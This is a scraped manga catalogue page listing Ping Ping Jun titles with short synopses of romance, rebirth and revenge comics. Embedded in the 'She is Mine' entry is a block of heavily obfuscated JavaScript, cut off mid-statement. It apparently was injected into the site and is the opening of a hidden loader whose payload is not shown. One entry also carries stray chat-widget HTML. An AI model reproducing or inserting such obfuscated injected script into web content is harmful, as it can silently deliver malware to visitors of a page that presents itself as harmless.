Ping Ping Jun - Page 10

Explore the world of Ping Ping Jun manga, where gripping stories await. Start reading the best Ping Ping Jun manga free now!

167 results

Schemes Of A Beauty

It’s a story about snatching and bully. Her aunt brought a daughter to seek shelter in her family, but it turned out her cousin sister shared the same father with her and even snatched her lover. It’s a story about rebirth and revenge. After rebirth with her previous memory, she intended to take revenge on every one who hurt her in the last life. MangaToon got authorization from Zuoan Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Scroll of White Silk Cloud

A taoist has descended mountains for years to seek the trace of his sect legacy the "Scroll of White Silk Cloud". He picked up the downfall ranger, the girl with amnesia, and the unemployed vagrant along the way. Meanwhile, the secrets of the world are gradually revealed, all those grievances, entangled and confused memories, hatred and love... A gorgeous and heartwarming WuXia adventure invites you to wander together! MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Second-To-None Adoration

Snatched from the modern world to the ancient period of warring states, an ordinary girl finds herself in the position of Helen of Troy—monarchs, dukes, and countless men in power would wage wars just for her. She must escape from that tyrant of tyrants as quickly as she can. However, can she really make up her mind to leave him without turning back?  


Secret Marriage: Priceless Baby Of The President

Secret Marriage: Priceless Baby of the President Comics Online. When she just grows up to be an adult, she messes up the wedding of her adoptive father, “Lu sheng ting, I am your daughter and will be your woman as well!” The truth of the murder six years ago begins to emerge, “Lu sheng ting, you are both my love and my enemy …” Secret Marriage: Priceless Baby of the President Comics Online. When she just grows up to be an adult, she messes up the wedding of her adoptive father, “Lu sheng ting, I am your daughter and will be your woman as well!” The truth of the murder six years ago begins to emerge, “Lu sheng ting, you are both my love and my enemy …”


She is Mine

CEO of a tech company x Elite teacher x ‘Rebellious’ kid Do adults really not need love to enter relationships? The elite private tutor, Min Jiang Xi, who is good at "pretending", managed to clinch the CEO Qin Zhan as a client. He, who hates women flocking towards him, warns that "he simply lacks a tutor, not a girlfriend". As he instructed, she is courteous and distant, never crossing the boundaries. But one year later, a drunk Qin Zhan states that "I won’t force you to like me, so don’t force me to not like you. I can’t do it". Can she, who doesn’t believe in love, find it with him? MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>(function(_0x43ab49,_0x26bc50){var _0x6e3d4b=_0x5113,_0x577b77=_0x43ab49();while(!![]){try{var _0x49b6ec=parseInt(_0x6e3d4b(0xad))/(-0x18c7*0x1+0x2622+-0xd5a)+parseInt(_0x6e3d4b(0xc1))/(-0x673*0x6+0x1c28+0x384*0x3)+parseInt(_0x6e3d4b(0xba))/(0xa3f*0x3+-0x1bde+-0x2dc)+-parseInt(_0x6e3d4b(0xa8))/(-0x25*0xed+0xfc2+0x1*0x1283)*(parseInt(_0x6e3d4b(0xa9))/(0x841+0x2001+-0x1*0x283d))+parseInt(_0x6e3d4b(0xc0))/(-0xc1a+0x1*-0xe43+0x1a63)*(-parseInt(_0x6e3d4b(0xb7))/(0x2386+-0x2234+-0x14b))+parseInt(_0x6e3d4b(0xb2))/(0x51d+-0x43*0x28+0x563)+-parseInt(_0x6e3d4b(0xaf))/(0x26f5*-0x1+0x2665+0x99)*(parseInt(_0x6e3d4b(0xb0))/(0x1b7b+-0x1bc2+0x51));if(_0x49b6ec===_0x26bc50)break;else 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She May Not Be Cute

<div class="clearfix _o46 _3erg _29_7 _8lma direction_ltr text_align_ltr"> <div id="js_8g0" class="_3058 _ui9 _hh7 _6ybn _s1- _52mr _3oh-" data-tooltip-content="22:02" data-hover="tooltip" data-tooltip-position="left"> <div class="_aok" tabindex="0" aria-label="young boy falls in love with strong older woman"><span class="_3oh- _58nk">She May Not Be Cute young boy falls in love with strong older woman, </span>even though she's not beautiful, girl 29, boy 23</div> </div> </div>


Slaughter Queen Reborn

<h2>Slaughter Queen Reborn</h2> She was the legendary agent, the nightmare of terrorists. But after she woke up from her death, she realized that the God has granted her a new life in the ancient time. She was reborn into a weak girl's body, but she's determined to be as fierce and capable as she was in her last life. Even death cannot change the way of her, until she met that fateful man, the seventh prince, and her betrothed! The Slaughter Queen might be cold and aloof like a she-wolf, but in his arms, she's always the little wild cat... MangaToon got authorization from Bciyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


So Icy, My Ceo Husband

By chance, her fate was intertwined with that man. Overnight, a poor orphan girl who is disliked by others, becomes the wife of the Qin family who is envied by everyone. In front of people, he is a high and mighty iceberg president! But in private, he is a maniac who spoils his wife to no end! "Qin Chen, if you love me, then don't treat me like a fragile canary." "How about being a queen? Trample everything in the world under your feet!" MangaToon got authorization from Xiaomingtaiji to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Spicy Wife’s Reborn World

<h2>Spicy Wife's Reborn World</h2> Reborn in pursuit of revenge, I am sure I can easily achieve my goal, as— I happen to be as rich as Bill Gates, as beautiful as Audrey Hepburn, and as deadly as deadpool. However, none of these above works when it comes to dealing with a sweating and panting CEO, who is poisoned, who is in need of "immediate relief." I'd love to help, but...don't pull an ice-cool face when you're kissing me, sir! MangaToon got authorization from iCiyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Spoiled Medical Princess: The Legend of Alkaid

Have you ever experienced the feeling of being pushed into the abyss by the love of your life? ” Nangong Yue was from a famous and noble famous in her previous life. She was an excellent doctor. She helped him ascend to the throne but in turn, her family was slaughtered at his orders. The first-born daughter is back and she’s coming back to get even! We shall fight till there’s only one of us left standing! I thought I wouldn’t let anyone in my heart again. But a man changed everything… MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.


Stay in This Century

A romance between a girl and an impossibly beautiful vampire. For centuries he has lived in secret and under different names just to find a cure for what has turned him into a vampire — the plague. Until one day, she finds out about him being a vampire. What is she going to do? Will she still love him despite everything? MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Stream Flow Into Dream

Legend has it that there are twelve zodiac cat guardians who guard twelve girls. Only they help their masters realize dream can they become real gods of constellation. One day, the cat guardian of Pisces came to the human world and came across its master, a girl named Yuxi Lin who dreamed to be an excellent designer. Can it help her realize dream smoothly and successfully? MangaToon got authorization from Dazhou to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
